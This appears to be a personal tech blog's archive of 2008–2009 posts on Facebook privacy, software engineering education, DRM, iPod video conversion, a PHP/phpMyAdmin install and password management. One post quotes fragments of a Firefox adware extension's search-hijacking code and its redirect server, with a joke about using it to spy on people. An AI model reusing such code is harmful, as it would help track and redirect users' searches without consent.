Whose Responsibility Is Privacy?

December 22, 2009

The one thing that Facebook has consistently pissed users off about over the years is Privacy. The Electronic Privacy Information Center (EPIC) filed a 29-page complaint with the Federal Trade Commission (FTC), claiming that Facebook mislead its users with the recent updates to privacy. The complaint pretty much says that the changes are confusing to users so instead of keeping their information safe users end up losing jobs, being embarrassed etc…  While the social media giant has made some tremendous screw ups in the past in the realm of privacy, I think it’s about time we cut Facebook some slack (just a little though…)

I read through the complaint which pretty much goes over the history of Facebook’s Privacy changes pretty accurately (albeit with a pretty heavy bias). I encourage you to read it on your own. I’m going to skip going over all of that and skip right down to the basis on which EPIC is filing this complaint (towards the bottom of page 23):

98. Facebook is engaging in unfair and deceptive acts and practices. Such practices are prohibited by the FTC Act, and the Commission is empowered to enforce the Act’s prohibitions. These powers are described in FTC Policy Statements on Deception and Unfairness.


99. A trade practice is unfair if it “causes or is likely to cause substantial injury to consumers which is not reasonably avoidable by consumers themselves and not outweighed by countervailing benefits to consumers or to competition.”

One of the major complaints has been that Facebook’s new privacy settings reveal too much of a user’s personal information without giving them adequate controls to effectively manage the security of their personal information.  This is one point that I have to immediately disagree with. Facebook has always given some very granular controls on who can access every piece of information that you post. In fact, it gives you the ability to set specific settings for specific friends that you have… So if you want to allow your college friends to see certain pictures, but not your boss, you can do that. The argument has been made that these settings are too confusing or too hard for users to find or modify… To that I say: No, not really… And if they are then too bad.

Alright, that may have been a little bit harsh, but hear me out. I’ve been using Facebook for a good four years, and one of the first things I did when I started was modified my privacy settings so that I was pretty much invisible. My friends hated it because they couldn’t find me easily, and if they some how could they couldn’t even add me as a friend let alone see any of my information. This also meant that no one I didn’t want to find me or see my information could either. So, to be perfectly honest, when this recent migration occurred, I was fine. The system prompted me to “share my information with everyone” or keep my old settings. I kept my old settings and I was fine.

What I’m getting at is if users are going to get on the internet and share their information with websites such as Facebook, they should understand how to control such tools. Facebook is a company. Companies exist to make money. This particular company makes money by selling information (or advertising to you). While they haven’t made the best decisions in the past in regards to privacy, they’ve done a pretty good job of giving you control of who can actually access this information. So if you want to post pictures of you getting plastered on the company dollar, or engaging in illicit activities, then it is your job to make sure you control who has access to that information. If you decide to post on a friend’s wall about some illicit activity that you engaged in, and they don’t have their information blocked, then you’re the one that’s really at fault… not Facebook.

I really do not see this complaint going to far because the amount of benefit this site provides (as many users will attest) outweighs the injuries that its users incur due to it. Additionally, the injuries are self-inflicted. The argument comes up about the API and its access… If you have your controls set right the most that the API can obtain about you is your (Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages). Keep your profile picture clean. Other than that, the rest of the information is publicly available information. Any quick Google search could give me most of that and more “damaging” information.

The fact of the matter is, the responsibility of personal privacy resides with the user. If you have a problem with the way a site operates, then do not post your information on it. If you cannot read FAQs that are posted on a site that tell you how to protect your information, do not post it. Social Networking sites were not built for privacy. They were built for allowing users to network, and they do the best they can to help facilitate this… Okay, while trying to make money on the side, but can you really blame them. Here’s a thought. If you have such an issue with how Facebook handles privacy, stop using the site, and build your own that handles privacy in the most effective way.

I am not writing this because I firmly agree with all of Facebook’s privacy policies (or their others for that matter), nor do I work for Facebook, or support it 100%. I’m writing this because users need to start taking responsibility for the privacy of their own information on the internet. You can expect a bank not to release your current balance to public sources, or a hospital to not release your medical records, but when you post information on a social networking website that has specific terms and agreements about what can and cannot be done with the information you post, and how you control it, the responsibility lies with you.

Advertisements

The Importance of Engineering in Undergraduate Computer Science Programs

September 17, 2009

Recently I’ve been thinking heavily about the Computer Science program at Tech due to a number of changes that are quickly making their way into the curriculum. One of the more interesting decisions for changing the program that the Computer Science Department at Virginia Tech made was moving the Department into the College of Engineering. While the full potential of this move has not yet been realized, it was a move that has tremendous advantages for not only the department and its students, but also the industry and academia on a whole.

The advantages gained from such a move primarily surround the principles of Software Engineering. Software Engineering is a term that unjustly gets little to no credit among academics in the field. A large number consider it to be an abomination of sorts with no real meaning or value. They take it to be just one of those buzz words that is thrown about these days as “Web 2.0” and the like have been in the past. The fact of the matter is Software Engineering is a term that is far too often overlooked, particularly in academia, which is a trend that needs to stop if we would like to see growth in the field of Computer Science on a whole.

The industry has changed substantially since the early 1960s. We are no longer in an era where the field of Computer Science is completely dissociated from the rest of the world. Every business and organization out there sees the tremendous amount of value in having technology available to make jobs more efficient by increasing productivity through the elimination of complex or tedious tasks from the agendas of workers. It has thus become more important that the gurus of the Computer Science field fall into professions that require they understand business and customer needs. The backbone of our economy lies on the efficiency and productivity of our businesses, and by transitive property, at the fingertips of those gurus.

All this being said, it is a wonder that members of academia refuse to accept software engineering as a part (let alone a major component) of the Computer Science discipline. In fact, there are a number of papers and articles that have written off Software Engineering as a “pseudo science”.  In his article titled “What Is Software Engineering”[1], William Curran, an Associate Professor of Computer Science at Southeastern Louisiana University, states, “A software engineer is no more an engineer than a novelist is a word engineer.” This statement is wildly false. An explanation of this claim requires an answer to the fundamental question that Curran asks in the title of his article; what is software engineering?

Providing an answer to the question on what Software Engineering actually is requires a firm definition of what engineering is in its broadest terms. Engineering is a multifaceted discipline in which science and mathematics are applied to practical problems. This definition states in a fairly explicit manner that engineering is applied science. As software is a product of Computer Science, Software Engineering is unquestionably the application of Computer Science to practical problems. It is important to define Software Engineering deliberately in terms of Computer Science in order to establish Software Engineering as subset of Computer Science. Establishing this hierarchy prevents the “tainting” of the field that some believe occurs when using the term Software Engineering.

This structure leaves us two branches of Computer Science. One branch is for those who focus on theory and dive into research developing the foundation that is Computer Science, while the other branch focuses on the more practical side of the field. A more complete understanding of this requires a more in depth look into what a Software Engineer actually does. A Software Engineer is one who develops software to make something more efficient or to solve a particular problem that could not feasibly be solved by a human in a reasonable amount of time. It would be a false assumption to say that the Software Engineer just jumps straight into developing this software. That is what “code-monkeys” are for.  The engineering part of the Software Engineer’s job is to define and solve a problem. This is done through standard engineering methods, which include defining the problem, designing a potential solution to the problem (without actually implementing), considering the implications, and redesigning the solution until the best possible solution is reached.

A Software Engineer does all of these things the same way any other engineer would: by reaching back to the science. There of course factors beyond the pure science that the Software Engineer has to consider such as risk management, and human interaction, but this is no different from a Chemist designing a vaccine to cure a particular disease. At the end of the day all of these products are meant to benefit people, and if there is more loss than gain, then the engineer has failed in solving the problem they sought to tackle. Software Engineering is therefore not a pseudo science, but a practical science. Every technique that a Software Engineer employs to actually develop the software and solve the problem at hand reaches back to the science. It does not cheapen the work of those in the field of Computer Science or the field itself, but in fact enhances both. Knowledge without application is useless. This is not to cheapen the value of the Science by any means. Software Engineering depends on the Science, but the Science also requires some form of application to be beneficial.

The flaw in most Computer Science programs is that they produce two types of students: Students that can code until their fingers come off or students that appreciate the value of the theory and research and decide to continue developing the field. There is absolutely nothing wrong with these two products, but the fault is these programs lack the creation of a third type of student. That is to say they do not create Software Engineers. The value in a Software Engineer is that they can efficiently solve problems and implement them. You can give a developer any specification for a product and they can churn out code and produce a product that works, but it is the Software Engineers that you can hand a problem and leave it to them to develop a specification for a product and implement a solution that not only works, but works in the most efficient manner.

A significant number of undergraduates who receive their Bachelor’s Degree in Computer Science will head straight towards the industry. At current, the industry is flooded with developers who write brilliant code, but lack the ability to solve the problems that industry hands to them. The System Architects and other positions of the like are reserved for those who have gone on to higher education and received their Masters or Doctorate Degrees in Computer Science because they are the ones who know how to solve problems. Computer Science programs at Universities need to shy away from this trend. Every single Computer Science graduate, whether they are in an undergraduate program or a graduate program should leave with the ability to not only develop software, but also solve problems. This is achieved by teaching engineering methods in CS Programs.

Some would argue that this would flood the market with a number of Engineers who disagree on ideas or cheapen the value of a graduate degree. What it actually does is provides greater opportunity for advancement in the field of Computer Science. The more challenges that are solved, the harder the challenges become. Having great minds in the industry allows for the potential of these challenges being solved. Additionally, facilitating an engineering mindset throughout a Computer Science curriculum will also increase the number of students who remain on the side of academia due to their commitment to tackling the most challenging problems that the field faces at any given time.

Simple changes can be made to Computer Science programs to focus more on the practical application of the knowledge gained through analysis and research. Furthermore, an engineering approach to research and analysis enhances the value of the knowledge obtained. If members of academia remove the mindset that applying engineering methodology to Computer Science devalues the Science, the programs will begin to produce better engineers to face not only the problems of today, but the problems of tomorrow as well. The Computer Science Department at Virginia Tech has made a great first step in this direction, but there needs to be more of a movement by the entire academic community for the benefits to truly be realized.

[1]http://www.acm.org/ubiquity/views/b_curran_1.html


That Nasty Firefox Extension

February 26, 2009

So there has been a lot of noise on the interwebs about this new “malware”/”virus”/”worm” that apparently no anti-virus software has been able to detect or remove recently. Last week I was infected with this nasty little thing and it was really starting to piss me off. I had been searching madly across the Internet (using cached search pages, a little work around this bug) to try and find the solution to this little issue. I also ran every piece of malware and anti-virus software I have… which by the way is a lot.

After my holy-trinity of virus-killing software (Malwarebytes, Avira, and CCleaner) found nothing numerous times I was starting to get excessively frustrated. Then I came across a forum posts of Firefox users who all had the same issues… Turned out this was a Firefox specific problem (which of course I wouldn’t know because I never use IE, I assumed all was infected).

One user (bless him) said that this was an extension related issue, just find the extension folder that was modified around about the date you noticed the infections and remove it. Restart Firefox and it works without the problems. Me and my curious self… decided that I wanted to look at the code of this little thing.

So I dug in and copied the XUL (XML User Interface Language) file and opened it to see the code. These files, as a side, are used to change the user interface of Firefox, and are the reason that some extensions can make web pages change and do all the weird and cool things that we all seem to love… They are also the reason for my frustration over the past week..

So I open the file and look at the code and its very simple actually… Here are a few lines…

if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = ‘google’;
//    } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){
//        keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){
keyword = RegExp.$1;
engine = ‘yahoo’;

There are actually a number of lines like this for every single browser. Simple regular expressions and checks the search engine. If it matches, then you are going to see these random redirects to some adserver, then to a page of their choosing… Found this little variable, which is apparently the server your requests are redirected to and changed.

var __d = “http://v1.adwarefeed.com/ffjs.php?u=1145892647-2942932799-2535655826-377724549a=998&s=3&v=icv270109ff&e=”;
I love the Internet, but I hate stuff like this out there. Anyways, Removal instructions are simple:

1.) Go to: %Mozzila Firefox%\extensions\

2.) Delete folder xxxxx where xxxxx is something like {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA} and has a modified date around the time you got infected.

3.) Restart Firefox, problem solved.

And if you’re anything like me, look at the code for yourself and see exactly what it was doing… While nasty, its actually a pretty neat trick. Useful if you want to say… spy on someone using your internets. Oh, Change passwords if you’ve used any while being infected. Can never be too safe.


Installing phpmyadmin and PHP 5.2.* on a Centos 5.2 Server (updated)

February 17, 2009

So I spent the better part of last night (12-3:30am) trying to figure out just exactly how to get phpmyadmin installed on my Centos 5.2 Server. Now, I’m no dummy when it comes to linux, package management etc… But this was a task which apparently many other people have had trouble with. I finally gave up on it and went to bed, woke up this morning and went back to it… At which point I actually figured everything out and now have PHP 5.2.8 installed working with phpmyadmin 3.1.2 (which to day, all the most recent stuff) using mysql-server 5.1.31.

So here’s how I did it: Apparently the repositories that Centos 5.2 uses by default still have php 5.1.* so you can just do a yum update or yum install php. The first step here is to set up the Remi repository. He maintains a repository that has the most up to date version oh php and all of its extensions. You can set this up by doing the following:

$ wget http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-3.noarch.rpm

$ wget http://rpms.famillecollet.com/el5.i386/remi-release-5-7.el5.remi.noarch.rpm

$ rpm -Uvh remi-release-5-7.el5.remi.noarch.rpm epel-release-5.3.noarch.rpm

This will set up the Remi repository for yum. By default it is disabled so you’ll have to use the –enablerepo option with yum when you are using it to install or update anything. So in order to update to php 5.2.* you just say:

$ yum –enablerepo=remi install php

To verify that you have php 5.2.8 installed issue a

$ php -v

And you’ll get a response like:

PHP 5.2.8 (cli) (built: Dec  9 2008 14:11:33)
Copyright (c) 1997-2008 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

At this point I assume you already have mysql and mysql-server installed and configured. If not just issue:

$ yum –enablerepo=remi install mysql-server

It will install all of the necessary dependencies including mysql. Configuring mysql server using mysqladmin is actually out of the scope of this but there are plenty of tutorials online for that. Make sure you set up your   and passwords for accessing it otherwise you’ll have issues later.

Now, you’ll want to install php-mysql. Again use the remi repository for this, otherwise you’ll end up with tons and tons of dependency issues. Trust me, I learned this the hard way…

$ yum –enablerepo=remi install php-mysql

This will install the mysql.so module for you and add it to php.ini so you don’t need to add the extension=mysql.so. It does the same for mysqli.

So now you’ve got everything you need set up properly, so install phpmyadmin. Get the tar ball from the server, extract it somewhere in your htdocs folder, create a system link called phpmyadmin.  Go into the phpmyadmin and create a folder called config. Issue:

$ chmod o+rw config

Now because you’ve already set everything else up, you won’t receive the errors that I got on my first attempts. Now go to http:/www.yoursite.com/phpmyadmin/setup and follow the steps there. It’s a very nice little graphical interface that helps you set the configuration file. After this is done, move the config.inc.php file in the config directory to the head of the phpmyadmin directory. Then remove the permissions you set before:

$ chmod o-rw config

That’s it. Now you can go to http://www.yoursite.com/phpmyadmin and log in using your credentials for mysql-server.

Hope this saves everyone from running into all of the issues I had.




DRM and the Future of Digital Media Distribution

January 10, 2009

I have to start off by giving credit for this entry to my co-worker Red (http://www.lifeofred.com). It started off as a discussion of what exactly DRM is, but got me to thinking about a few other things as well – particularly the future of how media will be distributed.

Before I get into this whole thing, I do want to note that my opinions are strongly influenced by being a CS major and the whole Open Source concept. I believe that copyright laws in the US need to be reformed drastically, and that the major media industries need to hop on board and prepare for the huge change that seems somewhat inevitable. What I suggest here may not be the exact way that things need to happen, but I feel I can safely say I provide a proposal that would be a step in the right direction.

The distribution of media has certainly changed over the years.  There was a time when the only way people could hear music was if they were in the presence of the source.  From the radio to records to cassette tapes to CDs and MP3 players, we have seen a drastic change over time in how people listen to their music. We have also seen changes in how movies, and television shows are watched. From antenna, to cable, to Direct TV, VHS, DVRs, TiVo, DVDs and Blu-Ray.

Advancements in technology have made all forms of media readily available to anyone with an Internet connection. Peer 2 Peer file sharing programs like Limewire and BitTorrent have made this access even more widespread. Within minutes, a use can have access to a high definition DVD or Blu-Ray rip of a movie that hasn’t even hit the shelves yet (for free).

Years ago, in order to prevent this “unauthorized” copying and distribution, many publishers, hardware manufactures, and copyright holders began implementing various forms of DRM. DRM stands for Digital Rights Management but is essentially a generic term that refers to access control. It is implemented at various levels to prevent people from being able to copy, modify, or redistribute media.

Now, basically the way this works is by using an encryption scheme to access content. In ’96 the Content Scrambling System (CSS) scheme was introduced for DVDs and required hardware manufactures such as Sony, Samsung etc… to sign an agreement saying they will restrict access to output devices on there hardware while the media is playing and then they get the key to decrypt the discs. There’s an unwritten rule when it comes to computers…. No system is safe. Anything can and will be cracked, its just a matter of time. This was and so was every other scheme that came out including the new Blu-Ray schemes.

Technical Note (You can skip this if you want, just additional info for those curious.): The way these schemes are gotten around is a little thing called an analog hole. The idea is, at some point the digital media has to be decrypted and is eventually played in analog form. No DRM to control analog signals, so it is thus susceptible to being copied by some other program or hardware device at this point.

We clearly stated earlier that everything can and will be cracked, so how do you stop this duplication and distribution… You make it expressly illegal. In 1998, the US passed an Act called the Digital Millennium Copyrights Act which makes it illegal to produce or provide any technology that circumvents DRM. Now would be a good time to note that the government aims to protect the copyright holder (the creator of the work). What also happens, however, is the complete disregard for those who purchase the media.

It was once believed that when you purchase a CD or movie that you own it. Meaning you have the right to do as you please with it, including making digital copies because as we all know, hard copies degrade over time. With DRM, this is impossible… In fact, it is illegal, because in order for me to make digital copies I would need to strip the DRM from my legally purchased media. The way the industry tries to defend this is by saying once you purchase the media, you don’t own the media, you only own a license to use the media.

Does anyone else see a problem with this? Lets take a moment and talk copyrights. The copyright system in this country is tremendously flawed. It is impossible for someone to create derivative works (regardless of their improvements) without violating a copyright unless permission was previously obtained. Remixing music together for some very nice composition, or using scenes from various movies to create a new one, is essentially illegal.

The copyright system is designed to give the originator of the work “God-rights” to it. They can in effect stop progression because no one else can even attempt to make improvements. The Harry Potter novels are a perfect example of this. The stories Potter and his crew cannot legally be continued by another author without permission from the originator.

The same is done in software applications. It is illegal to reverse-engineer applications and expand or modify them even if it is for the better. Your everyday software imposes these restrictions. MS Office, Internet Explorer, AIM, etc… The Open Source community thinks a little differently and provides a bit of a model that should be followed in everyday US copyrights. When you obtain Open Source Software (freely available*) you get access to the code so you can modify and change it, and even provide to the rest of the world your changes. Most Open Source licenses merely say, give credit where credit is due.

That model of course could not work for the music and movie industries… Hell it barely works for the software industry as there is still a battle against open source… Open Source is winning. The problem with this model is too many in between people lose out on money. So the producers and advertisers, and all the unnecessary minions, lose out on the big bucks that they don’t deserve in the first place. A CD sells for about $16.00. Artists will see a very small percentage of that money. Maybe about $2.00 actually makes it to the artist.

Lets move just a little bit to movies. This is something that really bothers me. Well maybe not as much as TV shows, but we’ll get there… If I purchase a movie, I want a digital copy. Discs are annoying, and with devices like the WD TV HD Media Player coming out, unnecessary. But its illegal for me to rip these things to a hard drive, even though I bought them. I want to watch my movies anywhere. Just like I want to play my music anywhere. Why should copyright holders be able to dictate what I do with my media?

TV shows… Now this is a bit ridiculous that I’m even writing about it at all. When I watch cable television, I get to watch shows for free… I can store them on my DVR, and watch them over and over, and whatever.  For some reason though, people are sued over downloading television shows in digital format… Television shows that are also freely available on the Internet from the producer’s websites. What is the harm in letting someone watch something that is otherwise free, at there convenience (like when they don’t have an Internet connection)? Why are content providers fighting so hard to make sure that I can’t copy things from my DVR to a hard drive to clear up space and save things I want to watch later?

The war on “digital piracy” is excessive to say the least. It is also one that the media industries and the government are losing and will continue to lose. Within the next decade, it will be very uncommon to find anyone that actually purchases CDs (especially when they can download single tracks DRM-free now for so little). No one will go out and buy a $30 blu-ray disc when they can have the digital content fast and unrestricted. The media industry needs to pay attention to trends and jump on board fast.

Here’s my proposal for the future of digital media distribution. Audio tracks should be available to download, DRM-free for a much lower cost. At $1.29/track a person has almost no benefit in downloading music. DRM-free music is a necessity as people have a large variety of mediums they use to play there music and they like to share it among each of those mediums without having to pay for it twice.  You can’t give people a million devices and tell them to buy them all and then buy the same data for each individual device. More people would legally obtain their music were it not for DRM restrictions and excessive costs. This by the way also takes out all the middlemen. The artists will be the sole person to benefit from the sale of these tracks and that’s all that matters.

And so what if people do still share music on P2P programs. The music industry should work like the software industry. Software companies don’t make their money from selling software, they make it in consulting fees, and configuration with big businesses. Artists will make their money through endorsements by companies, concerts, and tours.

Movies – I envision a future where all movies are distributed in HD digital formats via the Internet. No need to waste money producing the disc, people want to store the media on hard drives. When you can buy a Tera-byte drive for under $200, there is no reason to not store your media. Sell the DRM-free digital formats for prices well below that of a disc. Most of the money made in movies comes from the time it was in theaters and endorsements from companies looking for advertisements in the movies.

If the media industries would stop being greedy, they would see that you don’t lose as much as they think they will by providing a fair and acceptable means for obtaining media. The government also needs to take a step back from this battle and revamp the way we do copyrights. Its old and outdated… We’re moving into a new age very quickly, and certain laws should be adjusted to align with that.

That’s my rant. Maybe someone will actually pay attention to how we do these things and fix it for the better… Or sooner or later, the media industries won’t be making any money at all.


Movies, iPods, and Evil Apple

November 25, 2008

So I recently ran into a bit of a technology issue in regards to video encoding which initially looked like it was heading towards a solution which required $$$… I don’t like spending money on technology issues.  Like all issues, however, there was an open source solution! Yay for the Open Source community…

Before I get into the solution let me give you a little back story on the issue I was having: For every person that hates Microsoft (in general), there is a half a person that hates Apple and Steve Jobs. For every CS Major that hates Microsoft, there are at least 2 that hate Apple. My point here… Both are evil, but I’m beginning to feel like Apple is even more evil than Microsoft.

A few months ago I decided I wanted an iPod. I avoided it for years, but I was tired of CDs, tired of listening to the same music over and over again… And with no MP3 playback in the car it was just frustrating. Of course when I buy things, I buy the most expensive thing out there so I got a Black 6th generation 120 GB iPod Classic. Great iPod, I love it, video playback, podcast, the whole nine yards.

Now anyone that has an iPod knows that for the only efficient way of managing stuff you put on the iPod is iTunes… Enter Evil #1: iTunes is good for two things: 1) Organizing your media and 2) keeping you all locked down because Apple hates you…

(Side note: This is from the actual iTunes License Agreement
“..You also agree that you will not use these products for any purposes prohibited by United States law, including, without limitation, the development, design, manufacture or production of missiles, or nuclear, chemical or biological weapons.”)

So initially I had the issue of putting songs on there, because for whatever reason when I was younger I ripped my CDs using Windows Media Player… Apple, your iPod, and iTunes hate *.wma so you must convert. Typically iTunes will try to convert to ACC which is Apple’s crappy proprietary format for songs, but I prefer mp3 which is universal. Conversion tools for songs are out there, but in general you have to pay for anything good. It sucks. (If anyone knows of any GOOD conversion tools, let me know)

So I got past that and I was happy, tons of music, good stuff iPod is great. Starting downloading podcast and that was great… Then I decided I wanted to put some of my movies on my iPod. Various comedy shows etc… Now in general, most movies you have on your computer are in the standard universal AVI format correct? So obviously when you try to add those to your iPod, it will be able to play them back right?

WRONG! Turns out you can’t even add *.avi files to your iTunes Library. You have to convert to mp4 or m4v. Ah, but beware, not both formats can be played back on your iPod. So me having purchased QuickTime Pro for some random reason a while ago decided to use the export tool that it had to convert to the correct format… But QuickTime doesn’t even support AVI! Apple is horrible. So I go out and find some crappy tool that converts from avi to mp4. It does its magic, it plays in QuickTime and even adds to iTunes… But can’t be added to my damn iPod! So I take this new file and try to export to the iPod format… The export tool that QuickTime Pro has failed 4 times. It sucks… As does its father Steve Jobs.

So at this point I’m fairly pissed off, and I keep searching for ways to do this and I find this beautiful tool called HandBrake. It converts pretty much all formats and fairly quickly… I went from avi to m4v for my iPod no problem in under 30 minutes a movie that was 1 GB in size. I now enjoy movies on my iPod. I recommend this tool to everyone… Its free and can be gotten from http://handbrake.fr.

Now one more thing that I must add that I found during this whole process… Apprently it is illegal, thanks to the Digital Millennium Copyright Act to override and DRM thats been put into DVDs etc… Now, I thought that once you bought and owned a DVD you can do as you wish with it… Just not make copies and sell them for profit. I thought you could make copies for yourself, including conversion so you can watch them on whatever medium you choose… I thought wrong. When you buy a DVD, you are merely buying a license to watch that movie.

This is just a tad confusing because if I bought a license to a movie… and destroyed my physical copy, I should easily be able to go back and get another physical copy correct? Nope… I hate legislation on technology… It fails because the Government knows nothing about technology… I hope Obama actually fixes some of this stuff with the new CTO of the Country…

That’s all for now.


Password Management

August 14, 2008

I was talking to my co-worker the other day and she was telling me about this “amazing” tool she found that manages your passwords, and all you have to do is remember one. I immediately knew what she was referring to and said that had been out for a while and that just about all browsers had that capability… I realized today that I spoke too soon. What I should have said was just about all decent browsers have that capability.

What I failed to realize at the time was that Microsoft Internet Explorer is still way behind the times. I’m used to using Firefox, and I knew for a fact that it had that ability, so naturally (and mistakenly) I assumed that Microsoft would have embedded such a simple feature into their product… I assumed wrong. Now before this article turns into a Microsoft bashing, or an article about why EVERYONE should use Firefox over IE (which you should: Get Firefox), I’m going to stop this intro and move into the meat of this “tech ed” article.

Password management comes with a few obvious pitfalls and benefits that I’ll go over here. Regardless of what browser you use, you’ve all undoubtedly seen those sometimes annoying pop-ups or check boxes asking you if you want to save your user name and password. These features are there for users out of convenience, but have a few drawbacks. What you end up with is saved credentials so that you do not have to log back into a site that you visit regularly. Now if you are the only person that ever uses this computer under that login name then this works great. The issues occur when you have multiple computers using the same computer to access the internet. If you save your passwords for all of your e-mails, blogs, bank accounts, social networking sites, etc… then the next person that uses your computer has access to all of this information.

Now password management comes in one of two forms; that is, browser based and cookie based. When you login to most e-mail applications on a web site there is normally a little checkbox that ask if you want to remain logged in. When you select that checkbox and login, what happens is a little file called a “cookie” (these are used for a number of things, there will probably be a separate article on this) is placed onto your computer. Now anytime you access that website no matter what browser, it attempts to read from that cookie to get your login credentials so that you don’t have to type them back in. You should always pay attention to these checkboxes because sometimes they are automatically selected and you have to deselect them. Because of security reasons, some sites like Yahoo are getting smarter and putting time limits on those cookies. So after a while it will expire and you’ll be forced to remember your password, but remember they do this for protection of your information.

The other type of password management is browser based management. Anytime you see a pop-up asking if you want (insert your browser here) to store your password for the future, that’s browser based management. The major benefit that browser based management has over cookie based management, is that with browser based management, you know exactly what is being stored – your credentials for that website, and nothing else – and there is no way for a remote attacker to obtain any additional information. If you want more detail on that, wait for another article.

The feature that I mentioned earlier that Firefox has is a nifty little tool that takes the benefits of password management and minimizes the pitfalls. If you are using Firefox, go to Tools->Options->Security. You will see two checkboxes. One says “Remember passwords for sites” and the other says “Use a master password”. Now by default, “Use a master password” is not selected. So if you have saved any of your passwords, then anyone that uses the browser can access the sites where you have information stored. If you use a master password, then you merely have to remember a single password, so anytime you bring up Firefox, you put that password in and you can freely browse the websites where you previously saved your information without having to log in. If you do not put in that password, you will have to log in to each individual site. The only issue with this method is the security of that master password. If anyone else knows that password, then they too can access all of your sites.

One other method of authentication on websites that I have yet to mention is something referred to as single sign on. It is a concept that is used throughout enterprises and is starting to catch on in the web, but is still in its infancy when it comes to websites. Certain providers such as OpenID allow users to link their OpenID account to other websites that they use so that they only have to remember the OpenID password. Currently, you do not see this technology being used on major sites such as Banks, or Online stores because of security reasons, but the social networking arena is really taking to it.

So that’s about all I have on password management… Hope you all enjoyed this edition of Tech Ed – I’ve gotta get a better tag line.